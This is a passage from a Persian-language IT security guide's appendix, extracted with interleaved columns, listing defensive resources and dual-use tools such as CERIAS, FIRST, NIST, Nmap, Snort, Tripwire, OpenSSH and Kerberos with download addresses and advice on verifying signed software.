‫ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻧﺸﺎﻥ ﻣﺤﺪﻭﺩ ﺷﺪﻩﺍﻧﺪ )ﺑﻪﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ‬ ‫ﺟﺎﻣﻊﺗﺮﻱ ﺩﺭﺳﺖ ﻛﺮﺩﻩﺍﻧـﺪ(‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ‪ ،‬ﺍﻳـﻦ ﺑﺎﻳﮕـﺎﻧﻲ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺍﻫﺪﺍﻑ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻭ ﻳﺎ ﺁﻧﺮﺍ ﺩﺭ ﻛﻨﺎﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ‬ ‫ﻣﺠﻤﻮﻋــﻪﺍﻱ ﻋﻈــﻴﻢ ﺍﺯ ﺍﺑﺰﺍﺭﻫــﺎ ﻭ ﺍﺳــﻨﺎﺩ ﻣﻔﻴــﺪ ﺷــﺎﻣﻞ ﺑﺮﺧــﻲ‬
‫ﻓﺸﺮﺩﺓ ﻣﺤﺼﻮﻻﺕ ﺩﻳﮕﺮ ﻗـﺮﺍﺭ ﺩﺍﺩ( ﻭ ﻳـﺎ ﺑﻮﺳـﻴﻠﺔ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺿـﻮﺍﺑﻂ‬ ‫ﻣﻮﺿﻮﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺑﺎﻳﮕﺎﻧﻲﻫﺎﻱ ﺩﻳﮕـﺮ ﻳﺎﻓـﺖ ﻧﻤـﻲﺷـﻮﻧﺪ ﺭﺍ ﺩﺭ‬
‫ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ )ﺑﻪﻋﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﮔـﺮ ﺣـﺎﻭﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺑﺎﺷـﻨﺪ‪،‬‬ ‫ﺍﺧﺘﻴﺎﺭﺗﺎﻥ ﻗﺮﺍﺭ ﺩﻫﺪ؛ ﺑﻌﻼﻭﺓ ﻣﺴﺘﻨﺪﺍﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ‪ CERIAS‬ﻭ‬
‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﺍﺯ ﻧﻈﺮ ﺻـﺎﺩﺭﺍﺕ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺍﻣـﺎﻛﻦ ﺧـﺎﺹ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ(‪.‬‬ ‫ﻳﺎ ﻣﺆﺳﺴﺎﺕ ﻫﻤﻜﺎﺭ ﺁﻥ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ‪،‬‬
‫ﻣﺴﺘﻨﺪﺍﺗﻲ ﻛﻪ ﻫﻤﺮﺍﻩ ﺑﺎ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﻧﺪ ﺭﺍ‬ ‫ﺁﺩﺭﺳﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﻨﺎﺑﻊ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺩﺭ‬
‫ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺍﮔﺮ ﺩﺭ ﻣـﻮﺭﺩ ﻧﺤـﻮﺓ ﺍﺳـﺘﻔﺎﺩﺓ‬ ‫ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻳﻦ ﻣﺮﻛﺰ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ‪:‬‬
‫ﺻﺤﻴﺢ ﻭ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺁﻥ ﺗﺮﺩﻳﺪ ﺩﺍﺭﻳﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ‬ ‫‪http://www.cerias.purdue.edu/infosec/‬‬
‫ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺁﻧﻬﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ‪.‬‬ ‫‪ftp://ftp.cerias.purdue.edu‬‬

‫‪٥٠٦‬‬
‫ﺍﮔﺮﭼﻪ ﻣﺎ ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ﺁﻣـﺪﻩﺍﻧـﺪ ﺭﺍ‬ ‫‪) FIRST‬ﺗﻴﻢ ﺍﻳﻤﻨﻲ ﻭ ﻣﺮﻛﺰ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ(‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻳﻢ‪ ،‬ﺍﻣﺎ ﻧﻤﻲﺗـﻮﺍﻧﻴﻢ ﻣـﺴﺌﻮﻟﻴﺖ ﻋﻤﻠﻜـﺮﺩ‬ ‫ﻣﺆﺳﺴﻪﺍﻱ ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺑﻴﺮﺧﺎﻧـﺔ ﺁﻥ ﺣـﺎﻭﻱ ﻳـﻚ ﺑﺎﻳﮕـﺎﻧﻲ‬
‫ﺻﺤﻴﺢ ﻧﺴﺨﻪﺍﻱ ﻛﻪ ﺷﻤﺎ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻛـﺮﺩﻩﺍﻳـﺪ ﻭ ﺍﻳﻨﻜـﻪ ﺁﻳـﺎ‬ ‫ﻭﺳــﻴﻊ ﺍﺯ ﻣﻄﺎﻟــﺐ‪ ،‬ﺍﺯ ﺟﻤﻠــﻪ ﺁﺩﺭﺳــﻬﺎﻱ ﺻــﻔﺤﺎﺕ ﻭﺏ ﺳــﺎﻳﺮ‬
‫ﻛﺎﺭﺑﺮﺩ ﺁﻥ ﺩﺭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﺸﻜﻠﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻳﺎ ﺧﻴﺮ ﺭﺍ ﺑـﺮ‬ ‫ﺗﻴﻤﻬﺎﻱ ‪ FIRST‬ﻣﻲﺑﺎﺷﺪ‪:‬‬
‫‪http://www.first.org‬‬
‫ﻋﻬﺪﻩ ﺑﮕﻴﺮﻳﻢ‪ .‬ﻣﺸﺎﺑﻪ ﻫﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﻳﮕـﺮ‪ ،‬ﺍﺑﺘـﺪﺍ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ ﺭﺍ‬
‫ﺑﻴﺎﺯﻣﺎﻳﻴﺪ ﻭ ﺳﭙﺲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫‪NIST CSRC‬‬
‫ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻣﺆﺳــﺴﻪ ﻣﻠــﻲ ﻓﻨــﺎﻭﺭﻱ ﻭ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﺩﺍﺭﺍﻱ ﻳﻚ ﻛﻠﻴﺪ ‪ PGP‬ﺑﺮﺍﻱ‬ ‫)‪ ٥٠٧(NIST‬ﺑﺎﻳﮕﺎﻧﻲ ﻗﺎﺑﻞ ﺍﻋﺘﻤـﺎﺩ‪ ،‬ﻣﻔﻴـﺪ‪ ،‬ﻭ ﺟـﺎﻣﻌﻲ ﺍﺯ ﺍﺳـﻨﺎﺩ ﻭ‬
‫ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺍﻣﻀﺎ ﺑﻪ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥ ﻣـﻲﺩﻫـﺪ‬ ‫ﺍﺑﺰﺍﺭﻫﺎ ﺩﺍﺭﺩ‪:‬‬
‫ﺑﺘﻮﺍﻧﻴﺪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻛﻪ ﺁﻳـﺎ ﻧـﺴﺨﺔ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭﻱ ﻛـﻪ ﺷـﻤﺎ‬ ‫‪http://csrc.nist.gov/index.html‬‬
‫ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻩﺍﻳﺪ ﻫﻤﺎﻥ ﻧﺴﺨﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻧﻮﻳـﺴﻨﺪﺓ ﺁﻥ‬
‫‪Insecure.org‬‬
‫ﺑﻪ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺍﻳـﻦ ﺍﻣـﻀﺎ‬ ‫ﭘﺎﻳﮕﺎﻩ ﺍﺻﻠﻲ ﺍﺑﺰﺍﺭ ﭘﻮﻳﺶ ﭘﻮﺭﺕ ‪ ،nmap‬ﻛﻪ ﺩﺭ ﺁﻥ ﺁﺩﺭﺳـﻬﺎﻱ‬
‫ﺿﻤﺎﻧﺘﻲ ﺩﺭ ﻗﺒﺎﻝ ﻣﺸﺮﻭﻋﻴﺖ ﺧﻮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ‪.‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﻭﺏ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﻳﮕﺎﻧﻲﻫﺎﻱ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘـﺴﺘﻲ ﻣﻬـﻢ ﻭ ﺳـﺎﻳﺮ‬


‫ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺑﻪ ﺧﺎﻃﺮ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮﻱ ﻛﻪ ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲ ﺗﻮﺍﻧـﺪ‬
‫‪http://www.insecure.org‬‬
‫ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑﻴﺎﻓﺰﺍﻳـﺪ‪ ،‬ﻣـﺎ ﺑـﻪ‬
‫ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻮﺻﻴﺔ ﺍﻛﻴﺪ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﮔﺎﻣﻬﺎﻱ ﺍﺿﺎﻓﻪ‬

‫‪506 Forum of Incident Response and Security Teams‬‬


‫‪508 National Institutes of Health‬‬ ‫‪507 National Institute of Standards and Technology‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٨٤‬‬

‫ﻓﺮﺍﻣﻴﻦ‪ ،‬ﻭ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ )ﻛﻪ ﺍﻳﻤﻨﻲ ﺁﻥ ﺑﺎ ﺗﻜﻴﻪ ﺑﺮ ﺭﻣﺰﻧﮕﺎﺭﻱ‬ ‫ﺑﺮﺍﻱ ﺗﻮﻟﻴﺪ ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣـﺴﺘﻘﻞ ﺑـﺮﺍﻱ ﻫـﺮ ﺑـﺴﺘﺔ‬
‫ﭘﺪﻳﺪ ﺁﻣﺪﻩ ﺍﺳﺖ(‪ .‬ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﭘـﺮﻭﮊﺓ ‪ OpenBSD‬ﻃﺮﺍﺣـﻲ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﻃﻲ ﻛﻨﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺭﺍ‬
‫ﺷﺪ‪ ،‬ﺍﻣﺎ ﻧﺴﺨﺔ ﻗﺎﺑﻞ ﺍﻧﺘﻘـﺎﻝ ﺁﻥ ﺭﻭﻱ ﻏﺎﻟـﺐ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ‬ ‫ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺩﺍﺭﻧﺪ ﻧﻴﺰ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨـﻴﻢ ﻛـﻪ ﭘـﻴﺶ ﺍﺯ‬
‫‪ Unix‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﺑـﻞ ﺍﺟـﺮﺍ‬ ‫ﺩﺭﻳﺎﻓﺖ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﺍﻣﻀﺎ‪ ،‬ﺣﺘﻤﹰﺎ ﭼﻨﺪ ﻣﻨﺒﻊ ﺩﻳﮕـﺮ ﺭﺍ ﻧﻴـﺰ‬
‫ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺗﺤﺖ ‪ Windows‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﺯﻳـﺎﺩﻱ‬ ‫ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻣﻀﺎﺷﺪﻩ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ SSH‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪ ،‬ﻣﺎﻧﻨـﺪ ﺍﺑـﺰﺍﺭ‬
‫‪ .PuTTY‬ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ ﺷـﻮﻳﺪ‪ ،‬ﺳـﺮﻭﻳﺲ‬ ‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻭ ﻣﻨﻈﻮﺭﻩ‬
‫‪ telnet‬ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴـﺪ ﻭ ﺍﮔـﺮ ﺑﺎﻳـﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ ﺑـﻪ‬
‫‪Kerberos‬‬
‫ﺳﻴـ ـﺴﺘﻢ ﻣﺘـــﺼﻞ ﺷـــﻮﻳﺪ‪) OpenSSH ،‬ﻳـــﺎ ﺍﻧـــﻮﺍﻉ ﺩﻳﮕـــﺮ‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻣﻦ ﺗﺤﺖ ﺷـﺒﻜﻪ ﻛـﻪ ﺑـﺮ ﻣﺒﻨـﺎﻱ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ (SSH‬ﺭﺍ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻲ ﺗﻮﺍﻧﻴـﺪ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪ .‬ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﻭ ﻣﻘـﺎﻻﺕ‬
‫‪ OpenSSH‬ﺭﺍ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪:‬‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻳﻖ ﻣﺆﺳﺴﻪ ﻓﻨـﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳـﺖ )ﻳـﺎ ﻫﻤـﺎﻥ‬
‫‪http://www.openssh.org‬‬
‫ﺩﺍﻧﺸﮕﺎﻩ ‪ (MIT‬ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑـﺎ‬
‫‪OpenSSL‬‬ ‫ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﻜﺎﺗﺒﻪ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫‪٥١٠‬‬
‫ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺁﺯﺍﺩ ﺑـﺮﺍﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻻﻳـﺔ ﺳـﻮﻛﺖ ﺍﻣـﻦ‬ ‫‪MIT Software Center‬‬
‫‪W32-300‬‬
‫)ﻧﺴﺨﻪﻫﺎﻱ ‪ ۲‬ﻭ ‪ (۳‬ﻭ ﺍﻣﻨﻴﺖ ﻻﻳﺔ ﺍﻧﺘﻘﺎﻝ )ﻧـﺴﺨﺔ ‪ .(۱‬ﺍﻳﻦ ﻧﺮﻡﺍﻓـﺰﺍﺭ‪،‬‬ ‫‪20 Carlton Street‬‬
‫ﻻ ﻣﻮﺭﺩ‬‫ﻛﺘﺎﺑﺨﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻠﻬﺎ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬ ‫‪Cambridge, MA 02139‬‬
‫‪(617) 253-7686‬‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺩﻳﮕﺮ )ﻣﺜﻞ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ(‬
‫ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺍﺑـﺰﺍﺭ ﺧـﻂ ﻓﺮﻣـﺎﻥ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ‬ ‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ‪ FTP‬ﻧﺎﺷـﻨﺎﺱ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﻓﺎﻳـﻞ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﺭﻣـﺰﻱ‪ ،٥١١‬ﮔـﻮﺍﻫﻲﻫـﺎ‪ ،‬ﺍﻣـﻀﺎﻫﺎ ﻭ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫ﺷﻤﺎﺭﻩﻫﺎﻱ ﺗﺼﺎﺩﻓﻲ‪ ،‬ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ OpenSSL .‬ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ‬ ‫‪ftp://athena-dist.mit.edu/pub/kerberos‬‬
‫ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﺑﻴﺎﺑﻴﺪ‪:‬‬
‫‪ Kerberos‬ﺩﺭ ﺳﻴــــﺴﺘﻢﻋﺎﻣــــﻞ ‪ Windows 2000‬ﻭ‬
‫‪http://www.openssl.org‬‬
‫ﻭﻳﺮﺍﻳﺸﻬﺎﻱ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺟﺎﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪Snort‬‬
‫‪٥١٢‬‬
‫ﻳﻚ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ ﺁﺯﺍﺩ ﻗﺪﺭﺗﻤﻨـﺪ ﺑـﺮﺍﻱ ﺩﻳـﺪﻩﺑـﺎﻧﻲ ﺑـﺴﺘﻪﻫـﺎ ﻭ‬ ‫‪Nmap‬‬

‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﺍﺳـﺖ‪ .‬ﻣﺠﻤﻮﻋـﻪ ﺿـﻮﺍﺑﻂ ﺳﻴـﺴﺘﻢ‬ ‫ﻳﻚ ﭘﻮﻳﺸﮕﺮ ﭘﻮﺭﺕ ﻛﻪ ﻫﻢ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﻭ ﻫﻢ ﺭﺍﻫﺒﺮﺍﻥ‬
‫ﻣﻬﺎﺟﻢﻳﺎﺏ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﺷـﻮﺩ ﻭ ﺁﻧـﺮﺍ ﻗـﺎﺩﺭ ﺑـﻪ‬ ‫ﺑﺮﺍﻱ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﻧﻔﻮﺫ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻧﺠﺎﻡ‬
‫ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﺑﻼﺩﺭﻧـﮓ ﺑـﺴﺘﻪﻫـﺎﻱ ‪ TCP/IP‬ﻛـﻪ ﺗﺤـﺖ‬ ‫ﭘﻮﻳﺸﻬﺎﻱ ﮔﻮﻧـﺎﮔﻮﻥ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ ‪ UDP ،TCP‬ﻭ ‪ICMP‬‬

‫ﻧﻈﺎﺭﺕ ﺩﺍﺭﺩ‪ ،‬ﻭ ﻧﻴﺰ ﮔﺰﺍﺭﺵ ﺗﺮﺍﻓﻴﻚ ﻣﺸﻜﻮﻙ ﻣـﻲﻧﻤﺎﻳـﺪ‪ .‬ﺍﻳـﻦ‬ ‫)ﺍﺯ ﺟﻤﻠﻪ ﭘﻮﻳﺸﻬﺎﻱ ﻣﺨﻔﻴﺎﻧﻪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬

‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪:‬‬ ‫ﺧﻮﺩ ﺑﻬﺮﻩ ﻣﻲﮔﻴﺮﻧﺪ(‪ ،‬ﻭ ﻗﺎﺑﻠﻴﺖ ﭘﻴﭽﻴﺪﺓ ﺗـﺸﺨﻴﺺ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ‬
‫‪http://www.snort.org‬‬ ‫)ﺷﺮﻛﺖ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﻭ ﻭﻳﺮﺍﻳﺶ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ( ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﺩﺍﺭﻧﺪ‪.‬‬

‫‪Tripwire‬‬ ‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬


‫)ﻛﻪ ﺗﻮﺳـﻂ ‪ Gene H. Kim‬ﻭ ‪Gene Spafford‬‬ ‫ﺑﺮﻧﺎﻣﺔ ‪Tripwire‬‬ ‫‪http://www.insecure.org‬‬
‫ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩ ‪ purdue‬ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ(‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬـﺎ‬
‫‪OpenSSH‬‬
‫ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﺍﺑﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﻭﺿﻌﻴﺖ ﻓﻌﻠـﻲ ﻣﺠﻤﻮﻋـﺔ‬ ‫‪٥٠٩‬‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ﺑـﺮﺍﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﭘﺮﻭﺗﻜـﻞ ﻻﻳـﺔ ﺍﻣـﻦ‬
‫)ﻭﻳﺮﺍﻳـﺸﻬﺎﻱ ‪ ۱‬ﻭ ‪ ( ۲‬ﺑﻤﻨﻈﻮﺭ ﻧﻤﻮﻧﻪﺳـﺎﺯﻱ ﺍﻳﻤـﻦ ﭘﺎﻳﺎﻧـﻪ‪ ،‬ﺍﺟـﺮﺍﻱ‬
‫‪510 Secure Socket Layer‬‬
‫‪511 Cryptographic Certificate Requests‬‬
‫‪512 Packet Sniffing‬‬ ‫‪509 Secure Shell Protocol‬‬
‫‪٤٨٥‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ‪:‬‬ ‫ﻣﺸﺨﺼﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎ ﺭﺍ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺎﺑﻪ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫‪ftp://ftp.porcupine.org/pub/security/index.html‬‬ ‫ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﺑﺮﺭﺳـﻲ ﻣـﻲﻧﻤﺎﻳـﺪ ﻭ ﻓﺎﻳﻠﻬـﺎﻱ ﺍﺿـﺎﻓﻪﺷـﺪﻩ‪،‬‬
‫‪ftp://ftp.cerias.purdue.edu/pub/tools/unix/netu‬‬
‫‪tils/portmap/‬‬ ‫ﻓﺎﻳﻠﻬﺎﻱ ﭘﺎﻙﺷﺪﻩ‪ ،‬ﻭ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻧﻬـﺎ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ‬
